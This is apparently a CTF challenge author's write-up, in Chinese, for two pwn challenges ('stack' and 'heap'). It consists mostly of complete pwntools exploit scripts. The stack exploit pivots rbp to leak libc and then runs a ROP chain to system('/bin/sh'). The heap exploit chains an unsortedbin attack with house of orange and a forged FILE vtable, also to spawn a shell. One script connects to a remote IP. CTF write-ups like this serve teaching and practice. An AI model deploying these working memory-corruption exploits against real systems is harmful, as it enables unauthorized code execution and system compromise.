Sictf_round2出题小记

stack

被非预期打穿了呜呜呜 应该清空一下栈的内容 或者加个内联汇编修改一下rdx寄存器的值

原本的做法是劫持rbp寄存器 修改rsi寄存器 随后就可以利用write函数泄露bss段上的libc

import json
import requests
from pwn import *
from ctypes import *
binary = "./pwn"
libc = ELF("./glibc-all-in-one/libs/2.35-0ubuntu3.1_amd64/libc.so.6")
elf = ELF(binary)
context.log_level = 'debug'
context.arch = "amd64"
#context.arch = "i386"
context.terminal = ['tmux','splitw','-h']
io = process(binary)
#io = remote("192.168.0.104",32770)

def debug():
    gdb.attach(io)
    pause()

io.recvuntil("Hello!!!")
leak_addr = 0x404040
write_addr = 0x4011E2
bss_addr = elf.bss(0xa00)
ptr_addr = 0x4011F1
payload = cyclic(0x20)+p64(leak_addr+0x20+0x20)+p64(ptr_addr)
# gdb.attach(io,'b *0x4011FE')
io.send(payload)
# pause()

payload = p64(bss_addr)+p64(write_addr)+cyclic(0x10)+p64(leak_addr+0x20)+p64(ptr_addr)
io.send(payload)
# pause()
io.send(p8(0x80))
# pause()
libc_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x21a780
success("libc_addr :"+hex(libc_addr))
system_addr = libc_addr + libc.sym['system']
binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
rdi_addr = libc_addr + next(libc.search(asm("pop rdi;ret")))
ret_addr = 0x000000000040101a
payload = cyclic(0x28)+p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
# gdb.attach(io,'b *0x4011FE')
io.send(payload)
io.interactive()

heap

house of orange 不过对泄露堆地址的步骤改了改

没开PIE 这样可以用unsortedbin attack往存放堆块指针的地址写入堆地址 就可以泄露堆地址了

然后要明白unsortedbin attack为什么使用过一次后 再次进行堆块操作就会报错 是因为破坏了main_arena以及fd bk域 修复一下就可以再次进行unsortedbin attack了 随后就是house of orange的部分了

from pwn import*
from ctypes import *
#io = process("./pwn")
io = remote("210.44.151.51",10202)
elf = ELF("./pwn")
context.terminal = ['tmux','splitw','-h']
#libc = ELF("./ld-linux.so.2")
libc = ELF("/home/chen/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
#libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
context.arch = "amd64"
context.log_level = "debug"
def debug():
    gdb.attach(io)
    pause()

def add(size,payload):
    io.recvuntil(">")
    io.sendline(b'1')
    io.recvuntil("Size :")
    io.sendline(str(size))
    io.recvuntil("Content :")
    io.send(payload)
def edit(index,size,payload):
    io.recvuntil(">")
    io.sendline(b'2')
    io.recvuntil("Index :")
    io.sendline(str(index))
    io.recvuntil("Size :")
    io.sendline(str(size))
    io.recvuntil("Content :")
    io.send(payload)
def show(index):
    io.recvuntil(">")
    io.sendline(b'3')
    io.recvuntil("Index :")
    io.sendline(str(index))

add(0x30,b'aaaa')#0
payload = cyclic(0x38)+p64(0xfc1)
edit(0,len(payload),payload)
add(0x1000,b'aaaa')#1
add(0x40,b'1')#2
show(2)
libc_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x3c5131
success("libc_addr :"+hex(libc_addr))
payload = cyclic(0x48)+p64(0xf51)+p64(0)+p64(0x4040E0+0x40)
edit(2,len(payload),payload)

add(0xf40,b'aaaa')#3
show(10)
io.recv()
heap_addr = u64(io.recv(4).ljust(8,b'\x00'))-0x22010
success("heap_addr :"+hex(heap_addr))
system_addr = libc_addr + libc.sym['system']
payload = p64(heap_addr+0x22010)+p64(heap_addr+0x90)*3
edit(10,len(payload),payload)
main_arena = libc_addr + 0x3c4b20+88
payload = cyclic(0x48)+p64(0xf51)+p64(main_arena)*2
edit(2,len(payload),payload)
add(0x30,b'aaaa')#4
IO_list_all = libc_addr + libc.sym['_IO_list_all']
payload = cyclic(0x30) #填充到old top chunk
fake_file = b'/bin/sh\x00'+p64(0x60) #覆盖size 使其释放到smallbin 0x60链表
fake_file += p64(0)+p64(IO_list_all-0x10) #伪造bk域
fake_file += p64(0)+p64(1) #布局io_write_ptr和io_write_base
fake_file = fake_file.ljust(0xc0,b'\x00') #填充偏移
payload += fake_file + p64(0)*3+p64(heap_addr+0x1a8)+p64(0)*2+p64(system_addr) #伪造vtable结构体
edit(4,len(payload),payload)
io.recvuntil(">")
io.sendline(b'1')
io.recvuntil("Size :")
io.sendline(str(0x30))
io.interactive()
# debug()